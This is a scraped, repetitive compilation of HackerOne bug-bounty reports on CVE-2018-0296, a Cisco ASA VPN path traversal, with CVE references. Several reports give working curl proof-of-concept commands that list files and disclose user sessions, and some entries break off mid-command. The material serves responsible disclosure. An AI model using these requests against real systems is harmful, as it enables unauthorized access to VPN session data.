Updating to the latest version should fix the issue. Fixed version should give 404 "File not found" error.
Example of patched version:
```
curl -i -k "https://█████████.██████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessi
HackerOne
[CVE-2018-0296] Cisco VPN path traversal on the https://████████/ (█████████.mil)
hackerone·2024-06-18·CVSS 7.5
CVE-2018-0296 [HIGH] [CVE-2018-0296] Cisco VPN path traversal on the https://████████/ (█████████.mil)
[CVE-2018-0296] Cisco VPN path traversal on the https://████████/ (█████████.mil)
##Description
I discovered previously unidentified instance https://████/ (██████.mil) in ███ network, vulnerable to the CVE-2018-0296 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0296)
##POC
```
curl -i -k "https://█████████/+CSCOU+/../+CSCOE+/files/file_list.json" --path-as-is
```
██████
We can disclose user sessions by quering /sessions:
```
curl -i -k "https://████████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is
```
##Suggested fix
Updating to the latest version should fix the issue. Fixed version should give 404 "File not found" error.
Example of patched version:
```
curl -i -k "https://mvpn3.███/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-
HackerOne
[CVE-2018-0296] Cisco VPN path traversal on the https://██████████
hackerone·2024-06-18·CVSS 7.5
CVE-2018-0296 [HIGH] [CVE-2018-0296] Cisco VPN path traversal on the https://██████████
[CVE-2018-0296] Cisco VPN path traversal on the https://██████████
##Description
I discovered previously unidentified instance https://████████ in DOD network, vulnerable to the CVE-2018-0296 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0296)
It also accepts username and password for login flow instead secure cert auth.
##POC
```
curl -i -k "https://█████████/+CSCOU+/../+CSCOE+/files/file_list.json" --path-as-is
```
████
We can disclose user sessions by quering /sessions:
```
curl -i -k "https://█████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is
```
##Suggested fix
Updating to the latest version should fix the issue. Fixed version should give 404 "File not found" error.
Example of patched version:
```
curl -i -k "https://mvpn3.█████████/+CSCOU+/../+
HackerOne
https://█████████ Vulnerable to CVE-2018-0296 Cisco ASA Path Traversal Authentication Bypass
hackerone·2019-10-04·CVSS 7.5
CVE-2018-0296 [HIGH] https://█████████ Vulnerable to CVE-2018-0296 Cisco ASA Path Traversal Authentication Bypass
https://█████████ Vulnerable to CVE-2018-0296 Cisco ASA Path Traversal Authentication Bypass
Summary:
https://█████ is an ASA running software vulnerable to CVE-2018-0296 which allows a remote attacker to exploit a path traversal vulnerability and bypass authentication to sensitive files. The attacker can use this to enumerate the ASA VPN web directory structure and exploit privileged access to the system to gain access to session information.
Step-by-step Reproduction Instructions
1. You can exploit with cURL or Burp:
`curl -vk -m 45 --path-as-is https://████████/+CSCOU+/../+CSCOE+/files/file_list.json`
2. You can alter the command slightly to pull additional directory information:
`curl -vk -m 45 --path-as-is https://█████████/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b`
HackerOne
Cisco ASA Denial of Service & Path Traversal (CVE-2018-0296)
hackerone·2019-05-20·CVSS 7.5
CVE-2018-0296 [HIGH] Cisco ASA Denial of Service & Path Traversal (CVE-2018-0296)
Cisco ASA Denial of Service & Path Traversal (CVE-2018-0296)
Unpatched CVE-2018-0296 in test Cisco ASA instance (enter-test.odkl.ru)
http://packetstormsecurity.com/files/154017/Cisco-Adaptive-Security-Appliance-Path-Traversal.htmlhttp://www.securityfocus.com/bid/104612http://www.securitytracker.com/id/1041076https://ics-cert.us-cert.gov/advisories/ICSA-18-184-01https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180606-asaftdhttps://www.exploit-db.com/exploits/44956/http://packetstormsecurity.com/files/154017/Cisco-Adaptive-Security-Appliance-Path-Traversal.htmlhttp://www.securityfocus.com/bid/104612http://www.securitytracker.com/id/1041076https://ics-cert.us-cert.gov/advisories/ICSA-18-184-01https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180606-asaftdhttps://www.exploit-db.com/exploits/44956/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-0296
2018-06-07
Published
2021-11-03
Added to CISA KEV
Exploited in the wild